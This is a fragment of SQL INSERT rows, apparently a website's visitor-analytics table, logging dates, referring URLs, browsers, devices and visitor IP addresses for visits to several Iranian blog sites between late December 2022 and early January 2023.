(27211,'2022-12-29','http://ictbank.ir','Firefox','Windows','40.0','desktop','Unknown','','46.38.236.202','000',0,1,0),
(27212,'2022-12-29','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','71.6.199.23','000',0,2,0),
(27213,'2022-12-30','https://www.bing.com','Chrome','Windows','28.0.0.0','desktop','Unknown','','77.68.100.210','000',0,1,0),
(27214,'2022-12-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(27215,'2022-12-30','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Blade A520','','113.31.105.130','000',0,6,0),
(27216,'2022-12-30','http://ictbank.ir/blog','Chrome','Windows','11.0.0.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(27217,'2022-12-30','http://www.ictbank.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','36.255.223.135','000',0,2,0),
(27218,'2022-12-30','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.142.131.55','000',0,1,0),
(27219,'2022-12-30','http://www.design-arena.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','64.225.51.35','000',0,1,0),
(27220,'2022-12-30','http://ictbank.ir/blog','Chrome','Windows','10.0.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(27221,'2022-12-30','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(27222,'2022-12-30','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(27223,'2022-12-30','http://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','35.89.37.203','000',0,2,0),
(27224,'2022-12-30','http://ictbank.ir/blog','Firefox','Windows','8.0','desktop','Unknown','','139.162.237.98','000',0,2,0),
(27225,'2022-12-30','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','192.99.57.46','000',0,2,0),
(27226,'2022-12-30','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','92.222.70.66','000',0,1,0),
(27227,'2022-12-30','http://ictbank.ir/blog','Firefox','Windows','85.0','desktop','Unknown','','83.166.244.113','000',0,1,0),
(27228,'2022-12-30','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(27229,'2022-12-30','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.235','000',0,1,0),
(27230,'2022-12-30','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','60.13.138.72','000',0,1,0),
(27231,'2022-12-30','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','124.117.194.180','000',0,1,0),
(27232,'2022-12-30','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Galaxy Note 3','','110.52.194.112','000',0,1,0),
(27233,'2022-12-30','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Galaxy Note 3','','124.117.193.196','000',0,1,0),
(27234,'2022-12-30','http://mail.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.75','000',0,2,0),
(27235,'2022-12-30','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(27236,'2022-12-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(27237,'2022-12-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.199.124.59','000',0,1,0),
(27238,'2022-12-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(27239,'2022-12-30','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(27240,'2022-12-30','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Galaxy Note 3','','180.95.231.197','000',0,1,0),
(27241,'2022-12-30','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Galaxy Note 3','','222.94.140.184','000',0,1,0),
(27242,'2022-12-30','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','112.193.170.242','000',0,1,0),
(27243,'2022-12-30','http://ictbank.ir/blog','Safari','iOS','9.0','tablet','iPad','','221.212.178.27','000',0,1,0),
(27244,'2022-12-30','http://ictbank.ir/blog','Android Browser','Android','Unknown','mobile:smart','Blade A520','','61.147.15.67','000',0,2,0),
(27245,'2022-12-30','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(27246,'2022-12-30','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,9,0),
(27247,'2022-12-30','http://45.92.94.221/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.181.117','000',0,2,0),
(27248,'2022-12-30','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.189','000',0,3,0),
(27249,'2022-12-30','http://ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.167.53','000',0,1,0),
(27250,'2022-12-30','http://www.ictbank.ir/blog','Chrome','Windows','49.0.0.0','desktop','Unknown','','106.75.81.167','000',0,1,0),
(27251,'2022-12-31','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','147.135.129.229','000',0,2,0),
(27252,'2022-12-31','http://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(27253,'2022-12-31','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(27254,'2022-12-31','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','67.205.56.207','000',0,1,0),
(27255,'2022-12-31','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','36.40.66.38','000',0,1,0),
(27256,'2022-12-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(27257,'2022-12-31','http://wikisonnati.com','Chrome','Windows','58.0.0.0','desktop','Unknown','','212.38.178.27','000',0,2,0),
(27258,'2022-12-31','http://ictbank.ir/blog','Firefox','Windows','3.0.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(27259,'2022-12-31','http://ictbank.ir/blog','Unknown','Windows','Unknown','desktop','Unknown','','64.124.51.154','000',0,2,0),
(27260,'2022-12-31','http://ns1.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.107','000',0,1,0),
(27261,'2022-12-31','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','45.33.102.90','000',0,2,0),
(27262,'2022-12-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(27263,'2022-12-31','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.30','000',0,1,0),
(27264,'2022-12-31','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.101.60','000',0,1,0),
(27265,'2022-12-31','http://45.92.94.221:80/','Chrome','Windows','99.0.0.0','desktop','Unknown','','78.153.130.91','000',0,2,0),
(27266,'2022-12-31','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(27267,'2022-12-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.44','000',0,2,0),
(27268,'2022-12-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.46','000',0,2,0),
(27269,'2022-12-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','108.61.177.129','000',0,1,0),
(27270,'2022-12-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.199.124.59','000',0,1,0),
(27271,'2022-12-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.239.244','000',0,1,0),
(27272,'2022-12-31','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.62.98.236','000',0,1,0),
(27273,'2022-12-31','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','47.104.168.82','000',0,2,0),
(27274,'2022-12-31','http://design-arena.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','93.158.90.69','000',0,2,0),
(27275,'2022-12-31','http://wikisonnati.com','Chrome','Windows','58.0.0.0','desktop','Unknown','','54.36.163.203','000',0,2,0),
(27276,'2022-12-31','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(27277,'2022-12-31','http://45.92.94.221:80/blog','Firefox','Windows','65.0','desktop','Unknown','','45.83.65.77','000',0,1,0),
(27278,'2022-12-31','http://45.92.94.221/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.142','000',0,2,0),
(27279,'2022-12-31','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.89','000',0,2,0),
(27280,'2023-01-01','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,5,0),
(27281,'2023-01-01','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(27282,'2023-01-01','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','5.189.184.9','000',0,1,0),
(27283,'2023-01-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.89','000',0,2,0),
(27284,'2023-01-01','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.101.111','000',0,2,0),
(27285,'2023-01-01','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,2,0),
(27286,'2023-01-01','http://wikisonnati.com/blog','Chrome','Linux','75.0.0.0','desktop','Unknown','','37.187.76.75','000',0,2,0),
(27287,'2023-01-01','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,2,0),
(27288,'2023-01-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.54','000',0,2,0),
(27289,'2023-01-01','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.142.236.41','000',0,2,0),
(27290,'2023-01-01','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.69.190.30','000',0,2,0),
(27291,'2023-01-01','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','52.165.131.9','000',0,2,0),
(27292,'2023-01-01','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','40.122.202.97','000',0,2,0),
(27293,'2023-01-01','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','52.176.152.169','000',0,2,0),
(27294,'2023-01-01','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','52.176.159.186','000',0,2,0),
(27295,'2023-01-01','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','13.89.233.28','000',0,2,0),
(27296,'2023-01-01','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','13.89.238.140','000',0,2,0),
(27297,'2023-01-01','http://ictbank.ir/blog','Safari','OS X','15.0','desktop','Macintosh','','13.89.238.209','000',0,2,0),
(27298,'2023-01-01','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.140','000',0,2,0),
(27299,'2023-01-01','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Firefox','Windows','50.0','desktop','Unknown','','109.30.246.32','000',0,1,0),
(27300,'2023-01-01','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(27301,'2023-01-01','http://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.121','000',0,3,0),
(27302,'2023-01-01','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','45.9.110.186','000',0,4,0),
(27303,'2023-01-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(27304,'2023-01-01','http://ictbank.ir/blog','Opera','Windows','5.0','desktop','Unknown','','197.44.177.88','000',0,2,0),
(27305,'2023-01-01','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.65.134.167','000',0,1,0),
(27306,'2023-01-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.199.124.59','000',0,1,0),
(27307,'2023-01-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.113','000',0,1,0),
(27308,'2023-01-01','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,2,0),
(27309,'2023-01-01','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(27310,'2023-01-01','http://wikisonnati.com/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.71.103.173','000',0,1,0),
(27311,'2023-01-01','http://wikisonnati.com/blog/','Chrome','Windows','103.0.0.0','desktop','Unknown','','192.71.42.108','000',0,1,0),
(27312,'2023-01-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','50.87.138.230','000',0,1,0),
(27313,'2023-01-02','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,8,0),
(27314,'2023-01-02','http://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','46.191.249.142','000',0,6,0),
(27315,'2023-01-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.108','000',0,2,0),
(27316,'2023-01-02','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(27317,'2023-01-02','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','5.160.95.179','000',0,1,0),
(27318,'2023-01-02','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,2,0),
(27319,'2023-01-02','http://ictbank.ir/blog','Firefox','Windows','31.0','desktop','Unknown','','54.217.83.13','000',0,1,0),
(27320,'2023-01-02','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,4,0),
(27321,'2023-01-02','http://ictbank.ir/blog','Chrome','Windows','100.0.0.0','desktop','Unknown','','5.188.62.174','000',0,2,0),
(27322,'2023-01-02','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.51.198','000',0,2,0),
(27323,'2023-01-02','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.136','000',0,2,0),
(27324,'2023-01-02','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(27325,'2023-01-02','http://ictbank.ir/blog','Chrome','Linux','107.0.0.0','desktop','Unknown','','54.189.230.128','000',0,1,0),
(27326,'2023-01-02','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','93.113.225.68','000',0,1,0),
(27327,'2023-01-02','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,4,0),
(27328,'2023-01-02','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','51.254.59.113','000',0,2,0),
(27329,'2023-01-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,2,0),
(27330,'2023-01-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','104.238.170.64','000',0,1,0),
(27331,'2023-01-02','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','45.76.131.138','000',0,1,0),
(27332,'2023-01-02','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(27333,'2023-01-02','http://ictbank.ir/blog','Internet Explorer','Windows','7.0','desktop','Unknown','','208.80.194.121','000',0,1,0),
(27334,'2023-01-02','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,2,0),
(27335,'2023-01-03','http://design-arena.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.229','000',0,1,0),
(27336,'2023-01-03','http://ictbank.ir/blog','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.223','000',0,1,0),
(27337,'2023-01-03','http://design-arena.ir/blog/','Chrome','Linux','105.0.0.0','desktop','Unknown','','199.244.88.224','000',0,1,0),
(27338,'2023-01-03','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(27339,'2023-01-03','http://45.92.94.221/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.159','000',0,1,0),
(27340,'2023-01-03','http://45.92.94.221/blog/','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.247','000',0,1,0),
(27341,'2023-01-03','http://45.92.94.221/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.191','000',0,1,0),
(27342,'2023-01-03','http://ictbank.ir/blog','Chrome','OS X','11.0.0.0','desktop','Macintosh','','208.80.194.122','000',0,1,0),
(27343,'2023-01-03','http://wikisonnati.com/blog/','Chrome','Windows','83.0.0.0','desktop','Unknown','','37.139.53.82','000',0,3,0),
(27344,'2023-01-03','http://wikisonnati.com/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','89.117.20.171','000',0,2,0),
(27345,'2023-01-03','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','104.248.12.232','000',0,2,0),
(27346,'2023-01-03','http://45.92.94.221:80/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,2,0),
(27347,'2023-01-03','http://ictbank.ir/blog','Firefox','Linux','104.0','desktop','Unknown','','51.159.152.255','000',0,2,0),
(27348,'2023-01-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','202.21.38.89','000',0,2,0),
(27349,'2023-01-03','http://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(27350,'2023-01-03','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','189.120.76.30','000',0,1,0),
(27351,'2023-01-03','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','66.249.85.111','000',0,1,0),
(27352,'2023-01-03','http://ictbank.ir/blog','Edge','Windows','91.0.0.0','desktop','Unknown','','185.181.60.39','000',0,2,0),
(27353,'2023-01-03','https://www.google.ch/','Edge','Windows','108.0.0.0','desktop','Unknown','','194.209.10.66','000',0,1,0),
(27354,'2023-01-03','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','185.142.236.34','000',0,2,0),
(27355,'2023-01-03','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,2,0),
(27356,'2023-01-03','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','66.240.236.119','000',0,1,0),
(27357,'2023-01-03','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.44','000',0,2,0),
(27358,'2023-01-03','http://ns11.design-arena.ir/blog','Unknown','Unknown','Unknown','bot','Unknown','','87.236.176.48','000',0,1,0),
(27359,'2023-01-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.31','000',0,2,0),
(27360,'2023-01-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','95.179.210.248','000',0,1,0),
(27361,'2023-01-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','188.166.159.169','000',0,2,0),
(27362,'2023-01-03','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(27363,'2023-01-03','https://www.google.com/','Chrome','Android','105.0.0.0','mobile:smart','Galaxy A31','','5.208.106.147','000',0,6,0),
(27364,'2023-01-03','http://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','66.240.219.146','000',0,2,0),
(27365,'2023-01-03','http://45.92.94.221/blog','Firefox','Linux','73.0','desktop','Unknown','','165.22.32.29','000',0,2,0),
(27366,'2023-01-03','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.11','000',0,2,0),
(27367,'2023-01-04','http://45.92.94.221:80/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,3,0),
(27368,'2023-01-04','http://ictbank.ir/blog/','Chrome','Windows','90.0.0.0','desktop','Unknown','','46.191.249.142','000',0,6,0),
(27369,'2023-01-04','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,16,0),
(27370,'2023-01-04','http://ictbank.ir/blog/php-mysqli_connect-the-server-requested-authentication-method-unknown-to-the-client-caching_sha2_password/','Firefox','Windows','50.0','desktop','Unknown','','205.206.182.35','000',0,1,0),
(27371,'2023-01-04','http://45.92.94.221/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','113.125.51.198','000',0,2,0),
(27372,'2023-01-04','http://ictbank.ir/blog','Firefox','Windows','55.0','desktop','Unknown','','209.126.86.8','000',0,4,0),
(27373,'2023-01-04','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','125.18.44.66','000',0,1,0),
(27374,'2023-01-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(27375,'2023-01-04','http://ictbank.ir/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','159.89.193.115','000',0,2,0),
(27376,'2023-01-04','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.87','000',0,1,0),
(27377,'2023-01-04','http://ictbank.ir/blog','Chrome','Linux','63.0.0.0','desktop','Unknown','','122.15.156.138','000',0,3,0),
(27378,'2023-01-04','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','77.74.177.119','000',0,1,0),
(27379,'2023-01-04','http://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.126','000',0,1,0),
(27380,'2023-01-04','http://ictbank.ir/blog','Chrome','Windows','55.0.0.0','desktop','Unknown','','3.84.194.83','000',0,2,0),
(27381,'2023-01-04','http://ictbank.ir/blog','Chrome','Windows','71.0.0.0','desktop','Unknown','','93.159.230.88','000',0,1,0),
(27382,'2023-01-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.224.36','000',0,2,0),
(27383,'2023-01-04','http://ictbank.ir/blog','Safari','Windows','5.0.0','desktop','Unknown','','44.199.245.0','000',0,1,0),
(27384,'2023-01-04','http://ictbank.ir/blog','Unknown','Android','Unknown','tablet','Unknown','','93.158.91.187','000',0,1,0),
(27385,'2023-01-04','http://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,2,0),
(27386,'2023-01-04','http://ictbank.ir/blog','Vivaldi','Windows','5.0.0.0','desktop','Unknown','','51.89.201.226','000',0,9,0),
(27387,'2023-01-04','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','46.84.123.155','000',0,1,0),
(27388,'2023-01-04','http://ictbank.ir/blog','Chrome','Windows','108.0.0.0','desktop','Unknown','','66.249.93.175','000',0,1,0),
(27389,'2023-01-04','https://www.google.com/','Chrome','Windows','108.0.0.0','desktop','Unknown','','23.90.213.83','000',0,1,0),
(27390,'2023-01-04','http://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','35.90.109.74','000',0,1,0),
(27391,'2023-01-04','http://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','208.80.194.122','000',0,1,0),
(27392,'2023-01-04','http://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','54.217.178.104','000',0,1,0),
(27393,'2023-01-04','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','103.177.225.53','000',0,2,0),
(27394,'2023-01-04','http://wikisonnati.com/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.240.101.111','000',0,2,0),
(27395,'2023-01-04','http://ictbank.ir/blog','Edge','Windows','108.0.0.0','desktop','Unknown','','152.57.219.235','000',0,2,0),
(27396,'2023-01-04','http://ictbank.ir/','Firefox','Fedora','102.0','desktop','Unknown','','37.139.53.50','000',0,2,0),
(27397,'2023-01-04','http://ns10.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.47','000',0,2,0),
(27398,'2023-01-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','198.211.118.228','000',0,1,0),
(27399,'2023-01-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','178.128.165.136','000',0,1,0),
(27400,'2023-01-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','78.141.244.3','000',0,1,0),
(27401,'2023-01-04','http://ictbank.ir/blog/','Chrome','Windows','104.0.0.0','desktop','Unknown','','157.245.34.123','000',0,1,0),
(27402,'2023-01-04','http://www.wikisonnati.com/blog','Chrome','Windows','70.0.0.0','desktop','Unknown','','170.64.133.168','000',0,1,0),
(27403,'2023-01-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','162.247.73.192','000',0,1,0),
(27404,'2023-01-04','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.102.242','000',0,1,0),
(27405,'2023-01-04','http://wikisonnati.com','Chrome','OS X','18.0.0.0','desktop','Macintosh','','109.70.100.19','000',0,1,0),
(27406,'2023-01-04','http://wikisonnati.com','Chrome','OS X','18.0.0.0','desktop','Macintosh','','104.244.72.182','000',0,1,0),
(27407,'2023-01-04','http://ictbank.ir/blog','Chrome','OS X','18.0.0.0','desktop','Macintosh','','192.42.116.198','000',0,3,0),
(27408,'2023-01-04','http://ictbank.ir/blog/categories','Chrome','OS X','18.0.0.0','desktop','Macintosh','','103.251.167.20','000',0,1,0),
(27409,'2023-01-04','http://ictbank.ir/blog/category/database','Chrome','OS X','18.0.0.0','desktop','Macintosh','','176.126.253.190','000',0,2,0),
(27410,'2023-01-04','http://ictbank.ir/blog/category/os','Chrome','OS X','18.0.0.0','desktop','Macintosh','','23.129.64.214','000',0,4,0),
(27411,'2023-01-04','http://ictbank.ir/blog/comments/feed','Chrome','OS X','18.0.0.0','desktop','Macintosh','','103.251.167.21','000',0,2,0),
(27412,'2023-01-04','http://ictbank.ir/blog/feed','Chrome','OS X','18.0.0.0','desktop','Macintosh','','107.189.14.123','000',0,2,0),
(27413,'2023-01-04','http://www.ictbank.ir','Chrome','OS X','18.0.0.0','desktop','Macintosh','','185.14.97.176','000',0,1,0),
(27414,'2023-01-04','http://www.ictbank.ir','Chrome','OS X','18.0.0.0','desktop','Macintosh','','23.129.64.142','000',0,1,0),
(27415,'2023-01-04','http://45.92.94.221:80/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,2,0),
(27416,'2023-01-04','http://45.92.94.221/blog','Chrome','Windows','107.0.0.0','desktop','Unknown','','153.120.37.240','000',0,2,0),
(27417,'2023-01-04','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','177.141.113.2','000',0,2,0),
(27418,'2023-01-04','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','66.249.85.107','000',0,1,0),
(27419,'2023-01-04','http://ictbank.ir/blog','Chrome','OS X','108.0.0.0','desktop','Macintosh','','66.249.85.111','000',0,1,0),
(27420,'2023-01-04','http://ictbank.ir/blog','Chrome','OS X','36.0.0.0','desktop','Macintosh','','148.153.85.4','000',0,1,0),
(27421,'2023-01-05','http://mail.design-arena.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','66.94.99.113','000',0,2,0),
(27422,'2023-01-05','http://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','62.210.215.118','000',0,18,0),
(27423,'2023-01-05','http://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','68.69.184.202','000',0,1,0),
(27424,'2023-01-05','http://ictbank.ir/blog','Firefox','OS X','5.0.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(27425,'2023-01-05','http://ictbank.ir/blog','Firefox','Windows','67.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(27426,'2023-01-05','http://ictbank.ir/blog','Chrome','Windows','74.0.0.0','desktop','Unknown','','51.254.199.11','000',0,2,0),
(27427,'2023-01-05','https://www.bing.com','Chrome','Windows','41.0.0.0','desktop','Unknown','','68.183.90.100','000',0,1,0),
(27428,'2023-01-05','http://ns11.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.12','000',0,2,0),
